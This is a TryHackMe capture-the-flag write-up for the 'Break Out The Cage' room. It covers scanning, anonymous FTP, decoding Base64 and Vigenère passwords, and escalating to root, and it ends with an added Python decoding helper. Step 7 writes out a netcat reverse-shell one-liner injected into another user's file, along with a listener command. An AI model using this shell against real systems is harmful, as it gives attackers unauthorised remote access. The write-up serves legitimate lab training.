InfoSec Write-ups – Medium

No need to wait; connect to your OpenVPN network and join the room.
Task 1 Investigate!
1. After deploying the machine, you will get your machine IP in one minute. Let us start by scanning the machine with Nmap.
nmap -sV -sC -A <machine_ip>

2. Let’s search for hidden directories on the HTTP server with Gobuster.
gobuster dir -u http://<machine_ip> -w <wordlist>

3. Since nothing can be found on the HTTP server, let us open the FTP server and log in as anonymous.

4. We can see a file called “dad_tasks” containing a string that looks encoded. After many different tries, I was able to decode the string using CyberChef: first with Base64, then with the Vigenère cipher. This finally gives us Weston’s password.

5. We successfully got a shell as weston.


6. There is a dotfile in the /opt directory, which looks suspicious. Let’s check it.

7. At a specific time interval, we get a few messages from cage, and those quotes are stored in the .quotes file. We can remove all those quotes and add a reverse shell script to it.
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <system_ip> 1234 >/tmp/f' > .quotes

8. At the same time, we have to listen with Netcat in another terminal.
nc -lvp 1234
We successfully got the reverse shell, and the user is cage.

9. ‘Super_Duper_Checklist’ contains the user flag.

10. In the ‘email_backup’ folder, there are three emails. The third email gives us a note which looks encrypted.

11. The encrypted message can be decoded in CyberChef with Vigenère Decode. The key is ‘face’ because it was highlighted in that email. After cracking it, we get the password for root.

12. Changing the user to root.
su root

13. The root directory contains two email backups. The second email contains the root flag.

Boom!!! We have completed the room.
It was fun doing this challenge. I hope everyone learned something new:).
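
The two-layer decoding from step 4 (Base64, then Vigenère) and the Vigenère decode from step 11, as an added Python example that is not part of the original write-up. The sample blob is constructed here and is not the room's data; the key 'face' is the one step 11 names, the function names are hypothetical, and the code assumes the common convention that the key advances only on letters while case and punctuation are preserved.

```python
import base64


def vigenere(text: str, key: str, decrypt: bool = True) -> str:
    """Vigenere over A-Z/a-z. Non-letters are copied unchanged and do not
    consume a key letter; the case of each input letter is preserved."""
    shifts = [ord(k) - ord("A") for k in key.upper() if "A" <= k <= "Z"]
    if not shifts:
        raise ValueError("key must contain at least one ASCII letter")
    out, used = [], 0
    for ch in text:
        if ch.isascii() and ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            shift = shifts[used % len(shifts)]
            if decrypt:
                shift = -shift
            out.append(chr((ord(ch) - base + shift) % 26 + base))
            used += 1  # only letters advance the key position
        else:
            out.append(ch)
    return "".join(out)


def decode_layers(blob: str, key: str) -> str:
    """Undo the outer Base64 layer, then the inner Vigenere layer."""
    inner = base64.b64decode(blob, validate=True).decode("ascii")
    return vigenere(inner, key, decrypt=True)


# Constructed sample (not from the room): encrypt a note, then Base64 it,
# so the decode path above has a realistic two-layer input to work on.
SAMPLE_KEY = "face"
SAMPLE_PLAIN = "Rotate the backup password today!"
SAMPLE_BLOB = base64.b64encode(
    vigenere(SAMPLE_PLAIN, SAMPLE_KEY, decrypt=False).encode("ascii")
).decode("ascii")

if __name__ == "__main__":
    print("blob   :", SAMPLE_BLOB)
    print("decoded:", decode_layers(SAMPLE_BLOB, SAMPLE_KEY))
```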
TryHackMe: Break Out The Cage 1 Write-up was originally published in InfoSec Write-ups on Medium.